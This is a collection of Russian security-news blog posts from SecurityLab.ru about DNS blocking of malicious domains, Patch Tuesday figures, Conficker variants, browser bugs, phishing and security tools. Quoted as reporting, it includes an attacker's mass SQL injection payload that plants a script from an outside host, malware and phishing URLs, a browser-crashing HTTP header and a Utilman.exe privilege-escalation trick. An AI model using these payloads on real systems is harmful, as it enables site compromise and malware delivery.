Казалось бы, что проблема с обработкой дат была исправлена еще 10 лет тому, когда все СМИ с ужасом описывали проблему 2000 года. Никто не мог даже представить, что 2010 год также может преподнести нам сюрприз.
Как сообщается в SA Bug 6269, правило, существующее по умолчанию, FH_DATE_PAST_20XX соответствует каждому входящему письму.
Ошибка уже устранена и должна быть доступна через sa-update.
Также многие могут наблюдать на Unix системах до конца этой недели неожиданный вывод команды date '+%G', которая до понедельника будет сообщать нам, что сейчас 2009 год.
Сегодня мы ввели новый интерфейс комментариев на SecurityLab.ru. Теперь каждый зарегистрированный пользователь сможет оценить комментарии других посетителей сайта. Также добавлены дополнительные опции по сокрытию комментариев. Зарегистрированные пользователи смогут скрыть комментарии с низким рейтингом и скрыть комментарии от анонимных пользователей.
Также усиливаются методы автоматического блокирования комментариев для анонимных пользователей. Все эти методы не распространяются на зарегистрированных посетителей сайта.
Мы надеемся, что новый интерфейс будет более удобным для посетителей сайта. Если у вас есть комментарии, пожелания или замечания, вы можете их изложить в этом блоге.
Список IP адресов (без доменного имени), используемых в атаке:
Код
110.165.41.103
85.17.162.100
Я рекомендую администраторам заблокировать доступ к этим доменам. Доступ к доменным именам можно запретить как с помощью МСЭ, так и с помощью DNS сервера.
Блокирование доступа к доменным именам с помощью DNS сервера
Настройка BIND
Для блокирования доступа к доменным зонам создадим файл block-domains.dns следующего содержания:
Код
$TTL 86400 ; one day
@ IN SOA ns0.test.ru.
hostmaster.test.ru. (
2004061000 ; serial number YYMMDDNN
28800 ; refresh 8 hours
7200 ; retry 2 hours
864000 ; expire 10 days
86400 ) ; min ttl 1 day
NS ns0.test.ru.
NS ns1.test.ru.
A 127.0.0.1
* IN A 127.0.0.1
Символ * в последней строке означает, что для всех поддоменов требуемой зоны будет выдан IP адрес 127.0.0.1
Теперь в файл named.conf добавим записи интересующих нас доменных имен следующим образом:
Код
zone "evil.com" { type master; file "/etc/namedb/block-domains.dns";};
Все записи в файле named.conf будут указывать на файл зоны block-domains.dns, который будет общим для всех блокируемых доменных зон.
Настройка Microsoft DNS
1. Создание файла зоны
Создайте в оснастке dnsmgmt.msc новую первичную DNS зону с именем, например, block-domains.com.
В результате у нас будет создан файл block-domains.com.dns. Откройте созданную вами зону и добавьте запись хоста (тип A) с именем www и IP адресом 127.0.0.1.
2. Настройка DNS сервера на использование файлов зоны
Для того, чтобы можно было проще управлять зоной, настроим DNS сервер на хранение данных в файлах вместо реестра. Выберите меню Properties для DNS сервера, перейдите на вкладку Advanced и установите тип загрузки зон при запуске (Load zone data on startup) в значение Из файла (From File).
По умолчанию на Windows 2003 файл DNS зон хранятся в %SYSTEM ROOT%/system32/dns
Файл созданной нами DNS зоны будет выглядеть следующим образом:
Код
;
; Database file block-domains.com.dns for block-domains.com zone.
; Zone version: 2
;
@ IN SOA srv-sp1. hostmaster. (
2 ; serial number
900 ; refresh
600 ; retry
86400 ; expire
3600 ) ; default TTL
;
; Zone NS records
;
@ NS srv-sp1.
;
; Zone records
;
www A 127.0.0.1
Следует заменить в этом файле строку
Код
www A 127.0.0.1
на
Код
* A 127.0.0.1
3. Использование файла зоны block-domains.com.dns для других зон
Данные о загрузке зон находятся в файле boot в каталоге в %SYSTEM ROOT%/system32/dns. В настоящий момент у нас там находятся следующие записи:
Код
;
; Boot information written back by DNS server.
;
cache . cache.dns
primary block-domains.com block-domains.com.dns
Чтобы добавить блокировку нового доменного имени, следует просто добавить соотвествующую строку в этот файл:
Вот уже несколько лет подряд я с нетерпением ожидаю второй вторник месяца Именно в этот вторник секюрити-сообщество просматривает уведомления безопасности и анализирует свежеиспеченные патчи. Активная работа для специалистов по безопасности продолжается и в среду (по МСК). В этот день нас порадовал не только Microsoft, устранив 14 уязвимостей в PowerPoint, но и Adobe и Apple.
Итак, начнем с Microsoft.
Мне почему-то захотелось посчитать количество времени, которое производители потратили на выпуск исправления. К сожалению, здесь цифры выглядят не так, как в рекламных баннерах и буклетах
Итого, среднее время устранения уязвимостей в PowerPoint – 255,5 дней.
Первая колонка – дата уведомления производителя о наличии уязвимости. Эта дата взята из уведомлений, выпущенных ZDI и iDefense. Давайте обратим внимание на уязвимость CVE-2009-0556 (красная заливка в таблице). Об этой уязвимости стало известно публике немного более месяца тому, когда была замечена ее эксплуатация в целевых атаках. Как видно из таблицы, ZDI сообщила об уязвимости Microsoft больше года тому, а само исправление вышло только через месяц после появления эксплоита в публичном доступе. Еще один камешек в огород Microsoft – отсутствует исправление для Microsoft Office for Mac. По этому поводу SANS даже организовало голосование, и явно осудила действия производителя. Согласно результатам, 46,8% опрошенных считают этот шаг безответственным со стороны Microsoft.
Adobe
Начало года сложно назвать удачным для этой компании в плане безопасности их продуктов. С начала года в Adobe Acrobat было устранено 8 уязвимостей, одна из которых – уязвимость нулевого дня, в Flash Player 10 было устранено 4 уязвимости.
В 2009 году вредоносные PDF файлы стали самыми распространенными в целевых атаках. По данным F-Secure 48.8% целевых атак было осуществлено с использованием PDF файлов.
По сравнению с данными за 2008 год, первенство среди целевых атак занимал Microsoft Word (34.55%).
Apple
Здесь ситуация весьма интересная. Производитель устранил 67 уязвимостей в компонентах Mac OS X. Из них 18 относятся непосредственно к продуктам Apple, остальные уязвимости - к ПО сторонних производителей. С начала года в Apple Mac OS X было обнаружено 118 уязвимостей.
Для сравнения я приведу статистику по уязвимостям в ОС за 2008 год:
Остается надеяться, что в четверг не произойдет сбой Skype «после того, как пользователи одновременно решат перезагрузить свои компьютеры после установки исправлений» и Интернет продолжит свои существование
Вчера Microsoft внесла изменения в бюллетени безопасности MS08-069, MS08-076 и MS09-012.
MS08-069 – в список уязвимых приложений добавлены Microsoft XML Core Services 4.0 для Windows Vista SP2 и Windows Server 2008 SP2
MS08-076 – в список уязвимых приложений добавлено Windows Media Services 2008 для Windows Server 2008 SP2
MS09-012 – Добавлен Windows 2000 к списку уязвимых ОС, повторно выпущено исправление для Норвежской версии ОС.
Мы внесли соответствующие изменения в описание уязвимостей. Их можно просмотреть по адресам:
Множественные уязвимости в Microsoft XML Core Services Несколько уязвимостей в компонентах Windows Media Повышение привилегий в Microsoft Windows
С сегодняшнего дня Internet Explorer 8 является обязательным обновлением на сайте Windows Update и относится к высокоприоритетным установкам, как все исправления безопасности.
Пришло время IE8, и наверное это хорошо. На данный момент в IE8 не обнаружено ни одной уязвимости и это самый безопасный браузера на сегодня.
Согласно статистике SecurityLab, 9.4% посетителей все еще используют IE6, 14.3% - IE7. Судя по всему, эти цифры скоро поменяются в пользу IE8.
В боге SANS опубликован интересный пост, сообщающий о необычной активности от удаленной системы с именем lQPxf2ISQgEV1bGK. События в журналах на различных системах сообщают об удачных и неудачных попытках аутентификации. Как правило, в случае удачной попытки, системе с именем lQPxf2ISQgEV1bGK предоставляются привилегии гостевой учетной записи.
Событие из event log на Windows 2003:
Цитата
security: failure - 2009/04/16 10:32:10 - Security (529) - NT AUTHORITY_SYSTEM "Logon Failure: Reason: Unknown user name or bad password User Name: Domain: WORKGROUP Logon Type: 3 Logon Process: NtLmSsp Authentication Package: NTLM Workstation Name: lQPxf2ISQgEV1bGK Caller User Name: - Caller Domain: - Caller Logon ID: - Caller Process ID: - Transited Services: - Source Network Address: 192.168.163.101 Source Port: 0"
Событие с windows 2008
Цитата
security: failure - 2009/04/16 10:31:44 - Microsoft-Windows-Security-Auditing (4625) - n/a "The description for Event ID ( 4625 ) in Source ( Microsoft-Windows-Security-Auditing ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description_ see Help and Support for details.
Источником события могу быть как системы, подключенные к локальной сети, так и системы из Интернет. С первого взгляда причиной подобных событий является вредоносное ПО, и скорее всего это какой-то вариант червя Conficker. Если у кто-то наблюдал подобные события в своих журналах или знает их причину - не стесняйтесь отписать, буду весьма признателен
За прошедшие несколько дней были осуществлены некоторые изменения на арене Conficker. Мы бы хотели сообщить всем, кому это интересно, что MMPC работает над тем, чтобы во первых, у вас были все данные, которые необходимы для защиты от любой угрозы, во вторых чтобы вы хорошо понимали саму угрозу.
Нам стало известно о двух новых бинарных файлах. Мы бы хотели сообщить, что продукты Microsoft, такие как Windows Live OneCare, Windows Live OneCare и семейство Forefront смогли определить оба новых файла по существующим сигнатурам. Обновления для Worm:Win32/Conficker.gen!B и Worm:Win32/Conficker.gen!A не требуются. Определенные словари были добавлены для новых вариантов Worm:Win32/Conficker.D и Worm:Win32/Conficker.E.
Первый экземпляр (MD5: EB0787C5B388C685B406ED46AE077536/SHA1:4887AB470FF4E49BB5F7D01331F3DF16B2BB507B) содержал минимальные изменения к существующему варианту .D. Существующие сигнатуры определили его как Worm:Win32/Conficker.gen!B. Отличия между этими версиями состоят в следующем:
Дополнения к списку приложений, которые не могут быть запущены на зараженной системе. Это относится к программам, содержащим строки:
bd_rem
cfremo
kill
stinger
Также блокируются домены содержащие строки:
activescan
adware
av-sc
bdtools
mitre.
ms-mvp
precisesecurity
Стоит отметить, что некоторые утилиты безопасности и сайты, которые были замечены до 1 апреля, более недоступны пользователям, зараженным новой версией червя.
Повторим еще раз, что обновления не требуются для пользователей, которые используют утилиты Microsoft.
Второй обнаруженный файл, о котором пишут многие СМИ, известен как вариант .E (MD5: 677daa8bf951ecce8eae7d7ee0301780/SHA1: 879e553b472242f3ec5a7f9698bb44cad472ff3b). Сейчас этот вариант исследуется в нашей malware research lab. Существующие сигнатуры определили его как Worm:Win32/Conficker.gen!A.
С первого взгляда, этот вариант похож на вариант .A. И к счастью, продукты Microsoft смогли определить его без каких-либо исправлений. Более глубокий анализ показал следующие результаты (напоминаем, мы все еще исследуем его, но техотличий, которые были обнаружены, стало достаточно, чтобы назвать этот новый вариант Conficker.E):
Эксплуатирует уязвимость MS08-067
Содержит код для распространения через сетевые папки
Помещает драйвер, как и в предыдущих версиях, используя механизм Conficker.B.
Открывает процесс для прослушивания web на псевдо случайном порту от 1024 до 9999, основанном на серийном номере тома системного диска.
Отправляет себе поток случайно сгенерированных данных перед началом работы.
Содержит фильтрацию по IP, используемую в Conficker.D.
Использует SSDP для обнаружения интернет шлюзов (маршрутизаторов) и отправляем устройству SOAP команду для открытия внешнего TCP порта и перенаправления трафика на внутренний IP:порт.
Размещает на системе .dll с p2p функционалом.
Помимо вех отличий, важно упомянуть о ключевой разнице между вариантом .E и предыдущими вариантами A-D. Вариант .E выполняется одновременно с существующим Conficker.D на инфицированной машине. Например, отсутствие кода для проверки ссылок для обновлений не является важной задачей, т.к. это выполняет Conficker.D.
СМИ наполнены предположениями и теориями, кто и что связанно с этой активностью. Существует много уровней, которые остаются нераскрытыми. Мы бы хотели собрать все доказательства перед тем, как комментировать эти теории.
Ключевые выступления:
The Art of Click-Jacking - Jeremiah Grossman Cyberwar is Bullshit - Marcus Ranum
Презентации:
- Delivering Identity Management 2.0 by Leveraging OPSS
- Bluepilling the Xen Hypervisor
- Pass the Hash Toolkit for Windows
- Internet Explorer 8 - Trustworthy Engineering and Browsing
- Full Process Reconsitution from Memory
- Hacking Internet Kiosks
- Analysis and Visualization of Common Packers
- A Fox in the Hen House - UPnP IGD
- MoocherHunting
- Browser Exploits: A New Model for Browser Security
- Time for a Free Hardware Foundation?
- Mac OS Xploitation
- Hacking a Bird in The Sky 2.0
- How the Leopard Hides His Spots - OS X Anti-Forensics Techniques
Ключевая презентация: Dissolving an Industry as a Hobby - THE PIRATE BAY
Презентации:
- Pushing the Camel Through the Eye of a Needle
- An Effective Methodology to Enable Security Evaluation at RTL Level
- Remote Code Execution Through Intel CPU Bugs
- Next Generation Reverse Shell
- Build Your Own Password Cracker with a Disassembler and VM Magic
- Decompilers and Beyond
- Cracking into Embedded Devices and Beyond!
- Client-side Security
- Top 10 Web 2.0 Attacks
Inguma – это бесплатный набор инструментов для проведения испытаний на проникновение и обнаружения уязвимостей. Написан полностью на python. Включает в себя модули для обнаружения хостов, сбора данных, инструменты для фаззинга, брутфорса по именам пользователей и паролям, некоторые эксплоиты и дизассемблер.
В новой версии представлены следующие нововведения:
OpenDis Binary Navigator – навигатор по исполняемым файлам
PCAP Fuzzer – утилита для сбора данных в PCAP формате и автоматического фаззинга токенов соединения.
Также добавлены модуль db2discover для обнаружения серверов IBM DB2, фаззер протокола Informix SQLEXEC, библиотека libinformix, модули tcpproxy и hexdump и многое другое.
NMAP - легендарный сетевой сканер. Все, кто когда-либо интересовались сетевой безопасностью, пользовались и продолжают пользоваться им. Сам NMAP и его создатель Fyodor (в народе именуемый «Дядей Федей») не нуждаются в представлении.
После нескольких лет работы доступна книга Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (ISBN 978-0-9799587-1-7) – самое полное руководство по использованию nmap.
Мы благодарны Fyodor’у за проделанную работу и уверены, что эта книга станет настольным руководством для большинства безопасников и системных администраторов.
Мы уже много писали об уязвимости нулевого дня в Internet Explorer. В этой заметке я хочу собрать все данные в одно целое и поделиться некоторыми наблюдениями.
Уязвимость существует из-за ошибки в браузере при обработке XML тега. При посещении сайта, контролируемого злоумышленником, существует возможность выполнения произвольного кода на системе. По нашим данным удачная эксплуатация уязвимости происходит в 1 из 3 случаев.
Уязвимые приложения:
Microsoft Internet Explorer 6.x,
Microsoft Internet Explorer 7.x,
Microsoft Internet Explorer 8.x,
на платформах Windows XP, 2003, Vista и 2008
Как действуют злоумышленники:
Согласно полученному нами образцу лог файла, злоумышленники внедряют эксплоит на сайты, уязвимые к SQL инъекции. В этот раз инъекция эксплуатируется на через HTTP GET запрос, а через параметр ref файла куки:
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+']
set ['+@C+']=rtrim(convert(varchar(4000),['+@C+']))+
''<script src=hxxp://17gamo.com/1.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor
Как видно из кода, в страницу внедряется Javascript, загружаемый с адреса hxxp://17gamo.com/1.js:
Как мы видим, злоумышленники используют уязвимости в различных версиях Flash Player, NCTAudioFile2 ActiveX компоненте (разработчик закончил поддержу ActiveX компонента, но другие производители его по прежнему активно используют), в Microsoft Internet Explorer и других приложениях.
Эксплоит к ie7.htm загружает на систему файл hxxp://www.steoo.com/admin/win.exe, который является обычным вором паролей к играм (любимое занятие китайских хакеров ).
Под данным VirusTotal, его обнаруживают следующие антивирусы:
Компания Offensive Security опубликовала видео, демонстрирующее повышение привилегий на Windows Vista. Локальный пользователь может с помощью Live CD получить привилегии System на системе.
На этом видео атакующий использует LiveCD для подмены файла C:\Windows\System32\Utilman.exe файлом cmd.exe.
Utilman.exe - Windows Utility Manager, инструмент для управления пользовательскими свойствами.
Затем злоумышленник перезагружается в Windows Vista и использует комбинацию клавиш “Windows key”+”U” для вызова Utility Manager. Вместо него запускается файл cmd.exe c привилегиями учетной записи System.
Привет
Глянь мои новые ню фоты и видео, уверана оцениш
лицам до 18 лет вход воспрещен
выложила только вчера
mail.yandex.ru/%72?url=http://warmymusic.com.ar/new_fotos.exe
Целую,
Твоя Марина
Как вы видите, используется механизм перенаправления на сайте Яндекса и пользователь перенаправляется на сайт warmymusic.com.ar. Будте осторожны и всегда проверяйте URL перед нажатием на него.
Symantec сообщил об обнаружении активной эксплуатации уязвимости в Microsoft Media Encoder ActiveX компоненте, описанной в бюллетене безопасности MS08-053.
Вишинг атаки в последнее время становятся все более популярными среди злоумышленников.
Вишинг (Vishing == VoIP Phishing) – атака с использованием элементов социальной инженерии и VoIP для получения доступ к личным данным пользователей. Обычными рекомендациями против таких атак являются:
1. Проверка подлинности номера телефона компании, как правило, через Web сайт компании.
2. Перезвонить в компанию напрямую, чтобы быть уверенным, что вам звонят именно из этой компании.
На прошлой неделе Websense сообщила об обнаружении реверсивной вишинговой атаки в Китае. Злоумышленники сделали по существу бесполезными все вышеописанные предостережения:
1. Используя механизмы продвижения сайтов в поисковых системах, установили поддельные сайты компаний на первые позиции в поисковых запросах. (Использовались формы с большой посещаемостью).
2. Обманом заставили пользователей с помощью email перезвонить в компанию по указанному в письме номеру телефона.
Если пользователь решил проверить подлинность номера телефона через поисковую систему (к сожалению именно так и проверяется подлинность большинства номеров), он попадал на поддельный сайт, где был указан именно тот номер.
К сожалению, огромное количество уязвимостей в Web приложениях позволяют атакующему поместить необходимые данные и на Web сайт компании. Хотя подобной вишинг атаки еще не было, но это вполне возможный сценарий. К тому же, недавняя уязвимость в DNS может поспособствовать злоумышленникам в подмене содержимого Web сайта.
После звонка по указанному номеру, жертве включалась запись той компании, в которую он якобы звонил. Т.е. если вы когда-то уже звонили в эту компанию, то, услышав знакомую мелодию и «голос» АТС, у вас не возникнет больше никаких подозрений по поводу подлинности номера.
В Китае атака проводилась с использованием таких громких имен компаний как Sina, Taobao, QQ, Tencent и т.д.
Будьте осторожны, когда вам позвонят и скажут, что вы выиграли в лотерею и предложат стать «участником» вишинг атаки
Обнаружена очередная ошибка в браузере Google Chrome. На это раз, уязвимость существует из-за недостаточной проверки входных данных в имени файла в HTTP заголовке Content-Disposition.
Для автоматическоо закрытия браузера без каких-либо предупреждений достаточно отправить файл, длина имени которого около 1000 символов. Для появления окна с ошибкой и аварийного завершения работы браузера достаточно 300 символов в имени файла.
Цитата
Ответ сервера, завершающий работу браузера: HTTP/1.1 200 OK
Date: Fri, 05 Sep 2008 06:48:34 GMT
Server: Apache/2.2.6 (Win32)
Content-Disposition: attachment; filename=<от 300 символов>.psd
Content-Length: 4
Connection: close
Content-Type: application/octet-stream
test
===============================================================
UPDATE
05.06.2008 14.46
===============================================================
На сайте PandaSecurity.com опубликовано видео с демонстрацией очередной ошибки в браузере. Уязвимость существует из-за ошибки при отображении адреса ссылки в строке состояния, при наведении курсора мышки на специально сформированную ссылку, добавленную в папку "Избранное".
Ажиотаж вокруг нового браузера от компании Google не спадает. Вчера Google анонсировала первую beta версию своего браузера, а сегодня уже есть 3 уязвимости
Первая, о которой я писал раньше, позволяет удаленному пользователю аварийно завершить работу браузера.
Вторая уязвимость, которую описал Авив Рафф, позволяет злоумышленнику выполнить произвольный файл на системе.
И третья, PoC код к которой был только что опубликован на секлабе, позволяет злоумышленнику без уведомления пользователя загрузить произвольный исполняемый файл на систему в каталог, где сохраняются по умолчанию все загружаемые файлы.
PoC код:
Ну что же, как вы видите, ошибки весьма примитивны для современного поколения браузеров. Будем надеяться, что выход официальной версии Google Chrome не будет сопровождаться таким же количеством уведомлений в первые два дня релиза
Итак, через несколько часов после релиза первой бета версии, Rishi Narang сообщил о первой обнаруженной ошибки в новом браузере от Google. Конечно же, наличие ошибок в бета версиях – вещь самая обычная, и в багтраки подобные ошибки не попадают, но я подумал, что читателям секлаба будет интересно узнать о факте обнаружения первой ошибки в Chrome
Вы разрабатываете программное обеспечение, которое собираетесь распространять «не за спасибо» в андерграунде. Есть очень простое и надежное решение, предложенное производителями «Зевса»:
Эти меры не всегда помогают от неавторизованного распространения ПО, но все же улыбнуло
Вышла версия Metasploit Framework 3.1 - без сомнения самого лучшего инструмента разработки эксплоитов. В новой версии полная поддержка Windows систем (с GUI) и более 450 модулей, включая 265 эсплоитов для удаленного использования.
Последняя версия, вместе со скриншотами, видео и документацией доступна на сайте:
http://metasploit3.com.
Началась рождественская рассылка Штормового червя с целью пополнить ботнет «свежими силами». Пользователю предлагается посмотреть стриптиз на сайте merrychristmasdude.com. Письмо может содержать следующую тему:
I love this Carol!
Santa Said, HO HO HO
Christmas Email
The Perfect Christmas
Find Some Christmas Tail
Time for a little Christmas Cheer
И подобное содержание:
do you have a min?
This Christmas, we want to show you something you will really enjoy. Forget all the stress for two min and feast your eyes on these. http://merry christmasdude.com/
Доменное имя было зарегистрировано через nic.ru. Как и в предыдущих случаях бинарник меняется приблизительно каждые 15 минут.
Рекомендуем всем администраторам запрети доступ пользователей к домену merrychristmasdude.com.
Сама страница выглядит внешне, как и страница Яндекса. После ввода паспортных данных пользователю предлагается ввести платежный пароль (http://www.money-yandex.cn/login.php) и, затем, пользователь перенаправляется на сайт yandex.ru.
Сегодня получил интересный спам. Интересный в том плане, что в письме рекламировались не виагра и др. медицинские средства или «бесплатный сыр», а телепередача.
УТ-1 единственный государственный телеканал в Украине. Видимо кто-то очень хотел поднять рейтинг любыми средствами …
Время показа и даты стерты, чтобы не создавать доп. рекламу для тех, кто смог бы посмотреть эту программу.
CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) – инструмент защиты от автоматического заполнения и отправки HTML форм, используемый большим количеством Web приложений (в том числе и на SecurityLab). Существует также большое количество проектов, занимающихся, так называемым, взломом каптчи (ссылки приводить не буду, в Google их много). Люди пишут различные парсеры картинок, пытаясь попиксельно определить изображенные символы на картинке, анализируют секретные код и т.д. Но это все очень сложно, трудоемко и не надежно, ведь каптча ориентирована на то, что именно человек распознает картинку и введет правильный код. Так почему бы для этого не использовать человека?
Pandalabs обнаружила, весьма оригинальный, вариант обхода каптчи, совместимый с социальной инжинерией:
Пользователю предлагается установить (устанавливается) десктопное приложение, которое отображает девушку, предлагающую посмотреть стриптиз.
Кто может от такого отказаться? Тем более, что для этого требуется лишь набрать несколько символов.
Далее вы помогаете приложению правильно распознать изображение, и, таким образом, помогаете атакующему обойти защиту каптчи.
Такое приложение определяется Pandalabs как Trj/RompeCaptchas.A.
PS респект тем, кто придумал этот вариант обхода каптчи
HD Moore опубликовал в своем блоге 5 статей, в которых рассказывает о взломе iPhone. В первой статье рассказывается о архитектуре и демонстрируется шеллкод для уже измененного iPhone.
http://blog.metasploit.com/2007/09/ro...yours.html
И пятая - последняя статья – рассказывает о процессе разработки пейлоада, способного записать произвольные данные на диск и выполнить код. Статья заканчивается демонстрацией шелла, которым можно воспользоваться для получения удаленного доступа к iPhone, и демонстриурет, как можно с помощью шелла установить патч к уязвимости в libtiff от стороннего производителя.
http://blog.metasploit.com/2007/10/cr...art-3.html
Blink Personal Edition –комплексное решение для обеспечения безопасности от eEye Digital Security. Скачать приложение можно по адресу:
http://download.eeye.com/html/product...beta35.exe MD5: fce10f5ffde959548ceaddd540b936d3
SHA-1: 758895818f4716640b4f9f16504623e11d77024f
SQL CodeSecure является утилитой для защиты и аудита SQL Server 2005. Утлита позволяет следить за всеми изменениями в базе данных, логируя время, пользователя, IP адрес тип изменения и измененный объект, сам TSQL запрос и многое другое. Поскольку утилита вышла только сегодня и сайт разработчика недоделан, в ней возможны ошибки и бреши, но все же стоит посмотреть и оценить сам продукт, т.к. заявлен интересный функционал.
Триальную версию можно скачать по адресу http://www.sql-labs.com/downloads/SQLCodeSecure.zip Документация
Web камеры часто используются для видеонаблюдения и являются, таким образом, средством обеспечения безопасности. К сожалению в неумелых руках он могут стать средством утечки конфиденциальных данных.
Вы можете набрать в Google запрос «inurl:/view.index.shtml» и просмотреть список доступных публичных и частных web камер.
Утилита позволяет обнаружить JavaScript код, внедренный хакерами в Web страницу. Утилита показывает, что этот код делает на самом деле и позволяет специалистам по безопасности создать алгоритмы/функции для классификации, требуемой им. Основным преимуществом утилиты является то, что она основана на поведении кода, а не на его сигнатурах. Утилита обнаруживает специфические действия, характерны злонамеренному коду. Распространяется по лицензии GNU.
Компания Тренд Микро сообщает о выходе «обновлений» к n404 Web Threat Kit.
Растет количество взломанных сайтов, на которых размещается тег Iframe следующего содержания:
Код загружает сценарий VBScript и эксплуатирует уязвимость браузера для получения контроля над пользовательским компьютером. Генерация VBScript сценария происходит случайным образом, что существенно затрудняет обнаружение такого когда антивирусными ПО.
Тренд Микро утверждает, что сервер, на котором хостится злонамеренный код принадлежит русской компании.
Вчера вышла новая версия PHPIDS (PHP-Intrusion Detection System) 0.3.2.
Приложение представляет собой систему обнаруженя вторжения для Web сайта, написанную на PHP. Распространяется по лицензии LGPL.
http://php-ids.org/downloads/
Установлена новая версия форума, в которой:
1. добавлена новая возможность отправлять личные сообщения зарегистрированным посетителям форума. Работа с сообщениями осуществляется на странице "Личные сообщения", где можно написать, прочитать, удалить письмо в корзину или сохранить его в одной из настраиваемых папок. При получении нового личного сообщения, пользователю приходит уведомление по E-Mail
2. добавлена возможность предпросмотра сообщения перед отправкой
3. Новая страница для просмотра последних тем на всех форумах
4. Добавлена возможность модератору переносить темы текущего форума на другой форум, где он не является модератором
5. Внесены косметические изменения в страницу профиля пользователя
6. Появилась возможность подписки на текущую тему при создании сообщения
Сайт SecurityLab уже на новой HTML верстке. Если у кого будут проблемы с отображением контента нажмите пожалуйста ctrl+F5 в браузере.
Если вы заметили проблемы с отображением содержимого, не стесняйтесь писать об этом в комментариях